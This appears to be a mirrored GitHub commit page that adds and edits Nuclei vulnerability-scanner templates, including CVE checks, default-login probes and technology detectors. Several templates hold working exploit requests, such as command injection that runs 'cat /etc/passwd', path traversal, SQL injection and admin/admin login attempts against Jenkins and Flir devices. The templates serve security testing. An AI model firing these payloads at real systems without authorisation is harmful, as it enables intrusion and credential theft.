daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #52 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-05-22 19:47:49 +05:30 committed by GitHub
parent 9aa71e4954 56255be803
commit a45af2f778
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
60 changed files with 1053 additions and 128 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.nuclei-ignore
View File

@ -8,7 +8,6 @@
# unless asked for by the user.
tags:
- "headless"
- "dos"
- "iot"
- "misc"

10
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 311 | vulnerabilities | 153 | exposed-panels | 127 |
| takeovers | 67 | exposures | 99 | technologies | 67 |
| misconfiguration | 62 | workflows | 30 | miscellaneous | 20 |
| default-logins | 26 | exposed-tokens | 0 | dns | 8 |
| cves | 318 | vulnerabilities | 159 | exposed-panels | 131 |
| takeovers | 67 | exposures | 102 | technologies | 75 |
| misconfiguration | 63 | workflows | 31 | miscellaneous | 22 |
| default-logins | 28 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 9 | helpers | 8 | iot | 11 |
**105 directories, 1085 files**.
**108 directories, 1120 files**.
</td>
</tr>

20
cves/2009/CVE-2009-0545.yaml Normal file
View File

@ -0,0 +1,20 @@
id: CVE-2009-0545
info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference: https://www.exploit-db.com/exploits/8023
severity: critical
tags: cve,cve2009,zeroshell,kerbynet,rce
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"

25
cves/2014/CVE-2014-3744.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2014-3744
info:
name: Node.js st module Directory Traversal
author: geeknik
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
reference: |
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
- https://snyk.io/vuln/npm:st:20140206
severity: high
tags: cve,cve2014,lfi,nodejs,st
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"

5
cves/2019/CVE-2019-17270.yaml
View File

@ -8,10 +8,7 @@ info:
- https://www.exploit-db.com/exploits/47760
- https://nvd.nist.gov/vuln/detail/CVE-2019-17270
description: |
Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication,
it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components
Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht
Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices
A vulnerability in Yachtcontrol makes it possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
tags: rce,yachtcontrol,cve,cve2019
requests:

29
cves/2020/CVE-2020-15227.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2020-15227
info:
name: Nette Framework RCE
author: becivells
severity: high
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
tags: cve,cve2020,nette,rce
requests:
- method: GET
path:
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200

33
cves/2020/CVE-2020-36112.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2020-36112
info:
name: CSE Bookstore 1.0 SQL Injection
author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference: |
- https://www.exploit-db.com/exploits/49314
- https://www.tenable.com/cve/CVE-2020-36112
severity: critical
tags: cve,cve2020,sqli,cse
requests:
- raw:
- |
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
matchers:
- type: word
part: body
words:
- "get book price failed! You have an error in your SQL syntax"
- "Can't retrieve data You have an error in your SQL syntax"
condition: or

2
cves/2020/CVE-2020-5776.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
reference: https://www.tenable.com/security/research/tra-2020-51
tags: cve,cve2020,magmi
tags: cve,cve2020,magmi,magento
# Due to the lack of CSRF tokens, RCE (via phpcli command) is possible
# in the event that a CSRF is leveraged against an existing admin session for MAGMI.

2
cves/2020/CVE-2020-5777.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.
reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35
tags: cve,cve2020,magmi
tags: cve,cve2020,magmi,magento
# Response code 503 indicates a potential successful "Too many connections" error
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php

15
cves/2020/CVE-2020-9054.yaml
View File

@ -4,7 +4,20 @@ info:
name: ZyXEL NAS RCE
author: dhiyaneshDk
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9054
description: |
Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device.
ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it.
If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device.
Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges.
As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges.
By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device.
This may happen by directly connecting to a device if it is directly exposed to an attacker.
However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices.
For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system.
Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
reference: |
- https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/
- https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
tags: cve,cve2020,rce
requests:

27
cves/2020/CVE-2020-9490.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2020-9490
info:
name: CVE-2020-9490 Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
author: philippedelteil
name: CVE-2020-9490
severity: medium
description: Detects apache versions 2.4.43, 2.4.39, 2.4.38, 2.4.37, 2.4.35, 2.4.34, 2.4.33, 2.4.30, 2.4.29, 2.4.28, 2.4.27, 2.4.26, 2.4.25, 2.4.23, 2.4.20 that are POTENTIALLY vulnerable to CVE-2020-9490
description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
author: philippedelteil
tags: cve,cve2020,apache,dos
reference: |
- https://httpd.apache.org/security/vulnerabilities_24.html
@ -18,22 +18,7 @@ requests:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "Apache/2.4.20"
- "Apache/2.4.23"
- "Apache/2.4.25"
- "Apache/2.4.26"
- "Apache/2.4.27"
- "Apache/2.4.28"
- "Apache/2.4.29"
- "Apache/2.4.30"
- "Apache/2.4.33"
- "Apache/2.4.34"
- "Apache/2.4.35"
- "Apache/2.4.37"
- "Apache/2.4.38"
- "Apache/2.4.39"
- "Apache/2.4.43"
- type: regex
regex:
- "Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])"
part: header
condition: or

27
cves/2021/CVE-2021-24176.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2021-24176
info:
name: WordPress JH 404 Logger XSS
author: Ganofins
severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
references: |
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "JH 404 Logger"
part: body
- type: status
status:
- 200

57
cves/2021/CVE-2021-27850.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2021-27850
info:
name: Apache Tapestry - Arbitrary class download
description: |
A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
author: pdteam
severity: critical
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
tags: cve,cve2021,apache,tapestry
requests:
- raw:
- |
GET /assets/app/something/services/AppModule.class/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
- |
GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
extractors:
- type: regex
regex:
- '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
internal: true
name: id
part: header
group: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'application/java'
part: header
- type: word
words:
- 'configuration'
- 'webtools'
part: body
condition: and

20
cves/2021/CVE-2021-29622.yaml Normal file
View File

@ -0,0 +1,20 @@
id: CVE-2021-29622
info:
name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
author: geeknik
description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
severity: medium
tags: cve,cve2021,prometheus,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/new/newhttp://example.com"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header

2
cves/2021/CVE-2021-30461.yaml
View File

@ -4,7 +4,7 @@ info:
name: VoipMonitor Pre-Auth-RCE
author: shifacyclewala,hackergautam
severity: critical
description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
tags: cve,cve2021,rce,voipmonitor
reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/

23
cves/2021/CVE-2021-31800.yaml
View File

@ -1,23 +0,0 @@
id: CVE-2021-31800
info:
name: Impacket directory traversal
author: geeknik
description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
reference: https://github.com/SecureAuthCorp/impacket/pull/1066
severity: high
tags: impacket,cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"

1
default-logins/dvwa/dvwa-default-login.yaml
View File

@ -3,6 +3,7 @@ info:
name: DVWA Default Login
author: pdteam
severity: critical
tags: dvwa,default-login
requests:
- raw:

41
default-logins/flir/flir-ax8-default-credentials.yaml Normal file
View File

@ -0,0 +1,41 @@
id: flir-default-credentials
info:
name: Flir Default Credentials
author: pikpikcu
severity: medium
tags: default-login,flir
requests:
- raw:
- |
POST /login/dologin HTTP/1.1
Host: {{Hostname}}
Content-Length: 35
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: closen
user_name=admin&user_password=admin
matchers-condition: and
matchers:
- type: word
words:
- '"success"'
- type: dsl
dsl:
- contains(tolower(all_headers), 'text/html')
- contains(tolower(all_headers), 'phpsessid')
- contains(tolower(all_headers), 'showcameraid')
condition: and
- type: status
status:
- 200

50
default-logins/jenkins/jenkins-default.yaml Normal file
View File

@ -0,0 +1,50 @@
id: jenkins-weak-password
info:
name: Jenkins Weak Password
author: Zandros0
severity: high
tags: jenkins,default-login
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: {{cookie}}
j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
- |
POST /j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: {{cookie}}
j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: {{cookie}}
extractors:
- type: regex
name: cookie
internal: true
part: header
regex:
- 'JSESSIONID\..*=([a-z0-9.]+)'
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_4, "/logout")'
- 'contains(body_4, "Dashboard [Jenkins]")'
condition: and

5
default-logins/xxljob/xxljob-default-login.yaml
View File

@ -22,11 +22,16 @@ requests:
- type: word
words:
- '"code":200'
- '"msg"'
- '"content"'
condition: and
- type: word
words:
- 'application/json'
- 'XXL_JOB_LOGIN_IDENTITY'
part: header
condition: and
- type: status
status:

30
exposed-panels/exposed-nomad.yaml Normal file
View File

@ -0,0 +1,30 @@
id: exposed-nomad
info:
name: Exposed Nomad Jobs
author: pdteam
severity: high
tags: nomad,devops,hashicorp
reference: https://www.nomadproject.io/docs/internals/security
requests:
- method: GET
path:
- "{{BaseURL}}/ui/jobs"
matchers-condition: and
matchers:
- type: word
words:
- "Nomad"
- "nomad-ui"
condition: and
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

21
exposed-panels/jenkins-login.yaml Normal file
View File

@ -0,0 +1,21 @@
id: jenkins-login
info:
name: Jenkins Login
author: pdteam
severity: info
tags: panel,jenkins
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- 'Sign in [Jenkins]'
- type: status
status:
- 200

25
exposed-panels/magento-admin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: magento-admin-panel
info:
name: Exposed Magento Admin Panel
author: TechbrunchFR
severity: info
description: As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access.
reference: https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}/admin'
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
words:
- "/admin/index/index/key/"
part: header

3
exposures/backups/php-backup-files.yaml
View File

@ -25,9 +25,6 @@ requests:
- "{{BaseURL}}/wp-config.php.bak"
- "{{BaseURL}}/wp-login.php.bak"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: status

2
exposures/configs/magento-config.yaml
View File

@ -3,7 +3,7 @@ info:
name: Magento Config Disclosure
author: geeknik
severity: medium
tags: config,exposure
tags: config,exposure,magento
requests:
- method: GET

1
exposures/configs/netrc.yaml
View File

@ -12,6 +12,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/.netrc"
- "{{BaseURL}}/_netrc"
matchers-condition: and
matchers:

26
exposures/files/ioncube-loader-wizard.yaml Normal file
View File

@ -0,0 +1,26 @@
id: ioncube-loader-wizard
info:
name: Ioncube Loader Wizard disclosure
author: Mubassirpatel
severity: medium
description: ioncube-loader-wizard is vulnerable to xss,phpinfo, etc.
reference: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/
tags: ioncube,disclosure,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/ioncube/loader-wizard.php"
- "{{BaseURL}}/loader-wizard.php"
matchers-condition: and
matchers:
- type: word
words:
- "ionCube Loader Wizard"
part: body
- type: status
status:
- 200

26
exposures/files/joomla-file-listing.yaml Normal file
View File

@ -0,0 +1,26 @@
id: joomla-file-listing
info:
name: Joomla database files listing
author: iampritam
severity: info
reference: https://www.exploit-db.com/ghdb/6377
description: Searches for the pattern /libraries/joomla/database/ on passed URLs.
tags: exposure,joomla,listing
requests:
- method: GET
path:
- "{{BaseURL}}/libraries/joomla/database/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /libraries/joomla/database"
- "Parent Directory"
condition: and
- type: status
status:
- 200

64
helpers/payloads/request-headers.txt
View File

@ -3,31 +3,95 @@ Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Alt-Svc
Authorization
Base-Url
CF-Connecting-IP
Cache-Control
Client-IP
Cluster
Cluster-Client-IP
Connection
Contact
Content-Length
Content-MD5
Content-Type
Cookie
DNT
Date
Destination
Expect
Forwarded
From
Front-End-Https
HTTP_CLIENT_IP
HTTP_FORWARDED
HTTP_FORWARDED_FOR
HTTP_X_FORWARDED
HTTP_X_FORWARDED_FOR
Host
Http-Url
If-Match
If-Modified-Since
If-None-Match
If-Range
If-Unmodified-Since
Link
Location
Max-Forwards
Origin
Pragma
Profile
Proxy
Proxy-Authorization
Proxy-Connection
Proxy-Host
Proxy-Url
Range
Real-Ip
Redirect
Referer
Referrer
Refferer
Request-Uri
TE
True-Client-IP
UID
Upgrade
Uri
User-Agent
Via
Warning
X-ATT-DeviceId
X-Arbitrary
X-CSRFToken
X-Client-IP
X-Cluster-Client-IP
X-Correlation-ID
X-Csrf-Token
X-Do-Not-Track
X-Forward-For
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Proto
X-Forwarded-Server
X-Forwarder-For
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method-Override
X-Original-Remote-Addr
X-Original-Url
X-Proxy-Url
X-ProxyUser-Ip
X-Real-Ip
X-Remote-Addr
X-Request-ID
X-Requested-With
X-Rewrite-Url
X-UIDH
X-Wap-Profile
X-XSRF-TOKEN

20
miscellaneous/google-floc-disabled.yaml Normal file
View File

@ -0,0 +1,20 @@
id: google-floc-disabled
info:
name: Google FLoC Disabled
author: geeknik
description: The detected website has decided to explicity exclude itself from Google FLoC tracking.
reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/
severity: info
tags: google,floc,misc
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "interest-cohort=()"

25
miscellaneous/tabnabbing-check.yaml Normal file
View File

@ -0,0 +1,25 @@
id: tabnabbing-check
info:
name: Reverse Tabnabbing
author: bolli95
severity: info
tags: misc
reference: |
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- https://www.youtube.com/watch?v=TMKZCHYmtD4
- https://hackerone.com/reports/211065
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"

4
misconfiguration/java-melody-exposed.yaml
View File

@ -2,13 +2,13 @@ id: java-melody-exposed
info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK
author: dhiyaneshDK & thomas_from_offensity
severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a users session.
reference: |
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security
tags: config,jira,confluence,bamboo,atlassian
tags: config,java,javamelody
requests:
- method: GET

36
misconfiguration/springboot/springboot-beans.yaml Normal file
View File

@ -0,0 +1,36 @@
id: springboot-beans
info:
name: Detect Springboot Beans Actuator
author: ajaysenr
severity: low
description: Displays a complete list of all the Spring beans in the application
tags: springboot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/beans"
- "{{BaseURL}}/actuator/beans"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"type"'
- '"beans"'
- '"dependencies"'
- '"scope"'
condition: and
- type: status
status:
- 200
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header

1
misconfiguration/springboot/springboot-httptrace.yaml
View File

@ -10,6 +10,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/httptrace"
- "{{BaseURL}}/actuator/httptrace"
matchers-condition: and
matchers:

23
technologies/fanruanoa-detect.yaml Normal file
View File

@ -0,0 +1,23 @@
id: fanruanoa-detect
info:
name: FanRuanOA-detect
author: YanYun
severity: info
tags: oa,tech,dotnet,fanruan
requests:
- method: GET
path:
- "{{BaseURL}}/WebReport/ReportServer"
- "{{BaseURL}}/ReportServer"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'DeploySuccess._init'

21
technologies/fanruanoa2012-detect.yaml Normal file
View File

@ -0,0 +1,21 @@
id: fanruanoa2012-detect
info:
name: FanRuanOA2012-detect
author: YanYun
severity: info
tags: oa,java,fanruan,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'down.download?FM_SYS_ID'

27
technologies/landrayoa-detect.yaml Normal file
View File

@ -0,0 +1,27 @@
id: landrayoa-detect
info:
name: LandrayOA detect
author: YanYun
severity: info
tags: tech,landrayoa
requests:
- method: GET
path:
- '{{BaseURL}}/login.jsp'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'lui_login_input_username'
- 'lui_login_input_password'
condition: and
- type: word
words:
- 'isopen='
part: header

33
technologies/magento-detect.yaml Normal file
View File

@ -0,0 +1,33 @@
id: magento-detect
info:
name: Magento Detect
author: TechbrunchFR
severity: info
description: Identify Magento
tags: magento
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+}'
# There might be a better way to do that, the idea of this check is that Magento might be behind some kind of proxy when
# consumed by a SPA/PWA app so we need a valid GraphQL query from Magento to check
# https://devdocs.magento.com/guides/v2.4/graphql/
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(tolower(all_headers), "x-magento")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "graphql-authorization")'
- 'contains(body, "The current customer")'
- 'status_code == 200'
condition: and

9
technologies/magmi-detect.yaml
View File

@ -1,20 +1,23 @@
id: magmi-detect
info:
name: "MAGMI (Magento Mass Importer) Plugin Detect"
author: "dwisiswant0"
severity: "info"
name: MAGMI (Magento Mass Importer) Plugin Detect
author: dwisiswant0
severity: info
tags: magento,magmi
requests:
- method: GET
path:
- "{{BaseURL}}/magmi/web/js/magmi_utils.js"
matchers-condition: and
matchers:
- type: word
words:
- "magmi_multifield"
part: body
- type: status
status:
- 200

28
technologies/octobercms-detect.yaml Normal file
View File

@ -0,0 +1,28 @@
id: octobercms-detect
info:
name: OctoberCMS detect
author: cyllective
severity: info
description: Detects OctoberCMS
tags: tech,octobercms
references: https://github.com/octobercms/october
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/modules/system/assets/js/framework.combined-min.js"
redirects: true
max-redirects: 1
matchers:
- type: word
part: header
words:
- 'october_session'
- type: word
part: body
words:
- 'OctoberCMS'

26
technologies/pega-detect.yaml Normal file
View File

@ -0,0 +1,26 @@
id: pega-detect
info:
name: Pega Infinity Detection
author: sshell
severity: info
tags: tech,pega
requests:
- method: GET
path:
- "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: and
matchers:
- type: word
words:
- '"description" :"The Pega API'
- type: status
status:
- 200
- type: word
words:
- 'application/json'
part: header

24
technologies/voipmonitor-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: voipmonitor-detect
info:
name: VoipMonitor detect
author: Yanyun
severity: info
tags: tech,voipmonitor
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'share.voipmonitor.org'
- 'VoIPmonitor'
condition: and

23
technologies/xxljob-admin-detect.yaml Normal file
View File

@ -0,0 +1,23 @@
id: xxljob-admin-detect
info:
name: XXLJOB Admin Login
author: pdteam
severity: info
tags: tech,xxljob
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200

42
vulnerabilities/magento/magento-2-exposed-api.yaml Normal file
View File

@ -0,0 +1,42 @@
id: magento-2-exposed-api
info:
name: Exposed Magento 2 API
author: TechbrunchFR
severity: info
